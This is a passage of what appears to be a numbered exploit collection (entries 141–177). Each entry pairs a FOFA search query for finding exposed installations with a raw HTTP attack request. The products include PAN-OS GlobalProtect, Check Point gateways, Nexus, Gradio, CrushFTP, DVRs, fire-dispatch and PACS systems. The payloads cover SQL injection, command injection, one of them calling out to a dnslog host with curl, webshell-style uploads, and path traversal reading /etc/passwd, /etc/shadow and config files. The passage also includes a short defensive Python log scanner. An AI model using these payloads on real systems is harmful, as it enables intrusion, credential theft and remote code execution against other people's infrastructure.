Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the echoed file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-069711
FOFA: body="/common/scripts/basic.js"
The JSP is stored under a fixed directory with its original filename, so the verification URL is predictable.

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Verify: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
The CVE covers both Mura CMS and its open-source fork Masa CMS, which is why this entry and entry 187 carry different fingerprints for the same endpoint. The payload here is an error-based probe (a backslash-escaped quote in contenthistid); entry 187 gives a time-based payload for the same CVE.

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
The jobUpload SOAP method stores the <bufValue> content under the name given in <fileName>; dropping an .asmx web-service file this way yields a handler that the application executes (see the verification path below).

POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

The .asmx content in <bufValue> is too long for the article and is replaced by PAYLOAD (see the note at the top). Verify: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 path traversal / arbitrary file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
Unauthenticated. The percent-encoded slashes and dot-dot segments are decoded after the application's path checks and reach the filesystem. Fixed in Nexus Repository 3.68.1.

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

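As an added example (not part of the original article and not vendor code), the following Python checks request lines the way a defender reviewing access logs would: it percent-decodes until stable, resolves dot-dot segments, and flags a path that climbs above the web root or a parameter that carries a traversal. The sample request lines are copied from this article (entries 160, 167, 172, 174 and 178) plus one benign Nexus request; the function names are mine. The same escapes_root helper also applies to a bare path such as the Check Point POST body in entry 173.

```python
from urllib.parse import unquote, urlsplit, parse_qsl

# Request lines taken from the POCs in this article plus one benign line (constructed test data).
SAMPLE_REQUESTS = [
    "GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1",  # 160
    "GET /../../../../etc/passwd HTTP/1.1",                                                  # 172
    "GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1",                       # 167
    "GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1",  # 174
    "POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1",                                    # 178
    "GET /repository/maven-central/org/apache/commons/commons-lang3/3.12.0/commons-lang3-3.12.0.pom HTTP/1.1",  # benign
]


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %252F (double-encoded '/') is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def segments(path: str) -> list:
    """Split a decoded path on both slash styles, dropping empty and '.' segments."""
    path = decode_fully(path).replace("\\", "/")
    return [s for s in path.split("/") if s not in ("", ".")]


def escapes_root(path: str) -> bool:
    """True when resolving '..' segments climbs above the starting directory.
    Works for URL paths and for bare paths such as the aCSHELL/../../ POST body."""
    depth = 0
    for seg in segments(path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def has_dotdot(path: str) -> bool:
    return ".." in segments(path)


def classify(request_line: str):
    """Return a short reason if the request line looks like path traversal, else None."""
    try:
        _method, target, _version = request_line.split(None, 2)
    except ValueError:
        return None
    parts = urlsplit(target)
    if escapes_root(parts.path):
        return "path escapes web root"
    if has_dotdot(parts.path) and decode_fully(parts.path) != parts.path:
        # a '..' that only appears after decoding is the encoded-traversal pattern
        return "percent-encoded dot-dot in path"
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if has_dotdot(value):
            return f"dot-dot in parameter {name}"
        if decode_fully(value).lower().startswith(("file:", "/etc/", "c:\\")):
            return f"absolute or file: target in parameter {name}"
    return None


def scan(lines):
    """Yield (request_line, reason) for every flagged line."""
    for line in lines:
        reason = classify(line)
        if reason:
            yield line, reason


if __name__ == "__main__":
    for line, reason in scan(SAMPLE_REQUESTS):
        print(f"{reason:40s} {line}")
```

Run it over the request-line column of an access log; the benign Maven request is not flagged, the five POC lines are. The depth counter is deliberately stricter than a normalizer: a value like UploadFile/../Web.Config never leaves its start directory, which is why parameters are judged on the presence of a dot-dot segment rather than on escaping the root.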
161. 科拓 (Keytop) smart parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. <fileName> sets the file name (the ../ prefix walks out of the upload directory into the web root) and <fileFlow> carries the file content, which must be base64-encoded.

POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Step 2: request the written file: http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 (Hefeng multimedia information publishing system) QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
The remotePath field controls the destination directory, so the ASPX file lands directly in a web-accessible path.

POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Verify: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 (phone-card distribution management system) ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
ue_serve.php is a UEditor-style controller (the image action and the upfile field are UEditor conventions); it accepts a .php upload with an image Content-Type. The source gives no stored path.

POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 (smart-campus management system) FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
The uploaded filename is not kept: the file is stored as update.aspx under a fixed path, so verify with the URL at the end rather than with qaz.aspx.

POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Verify: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
The injection point is the sortOrder parameter. The payload is a sqlmap-style CASE WHEN probe: when the condition is true the expression is 1, otherwise the multi-row subquery on INFORMATION_SCHEMA.PLUGINS raises an error, so the two responses differ. The URL is truncated in the source and is reproduced as given:
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 (Zhongcheng Kexin ticketing platform) SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
The solutionNo parameter is injectable. The encoded value below decodes to ' AND 4172 IN (SELECT (CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(111)))-- , an error-based probe: SQL Server fails to convert the string "hello" to an integer and echoes it in the error message.

POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS lean value management system) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
The p parameter is not normalized before being joined to the download directory, so UploadFile/../Web.Config returns the application's Web.Config (connection strings, machine keys).

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
The path parameter is not a plain path; the value below is the encoded form from the public POC and should be sent verbatim.

GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
Time-based (SQL Server WAITFOR DELAY) via the id parameter; a vulnerable host delays the response by about 5 seconds. The /templates/attestation/../../ prefix normalizes away (the request resolves to /selfservice/lawbase/downlawbase) and is the same path-normalization bypass used in entry 170.

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
Same /templates/attestation/../../ prefix as entry 169. filename is resolved relative to a directory inside the Tomcat installation, so ../webapps/ROOT/WEB-INF/web.xml returns the deployment descriptor.

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 (CMSV6 vehicle GPS monitoring platform) SQL injection
FOFA: body="/808gps/"
Time-based (MySQL SLEEP) via the ids parameter; expect about a 5-second delay on a vulnerable host. The ;downloadLogger.action suffix is a servlet path-parameter trick: the container strips it before routing, so the request still reaches delete.do while the raw path no longer matches that action.

GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license-plate recognition camera) arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
Raw dot-dot in the request line. Send it with a client that does not normalize the path (curl --path-as-is, or a raw socket); otherwise the ../ segments are collapsed before the request leaves your machine.

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
The POST body is a bare path: aCSHELL/ followed by dot-dot segments. Affects gateways with the Remote Access VPN or Mobile Access blade enabled, and was exploited in the wild to read /etc/shadow and harvest local credentials, so treat a matching log entry as a compromise indicator and rotate local accounts, not just patch.

POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
The FilePath parameter accepts relative paths; the POC targets JHFileConfig.ini, one of the product's configuration files.

GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
Time-based (SQL Server WAITFOR DELAY) via IncentiveID; a vulnerable host delays the response by about 5 seconds.

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
The uploaded PHP runs a command and then deletes itself (unlink(__FILE__)). The source does not give the stored path.

POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
No fingerprint is given in the source. The configuration file is fetched through a path that normalizes to /<model>.cfg (the /userLogin.asp/../actionpolicy_status/../ prefix collapses away); the file name is the device model, so try each of the following against the router's web interface:

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
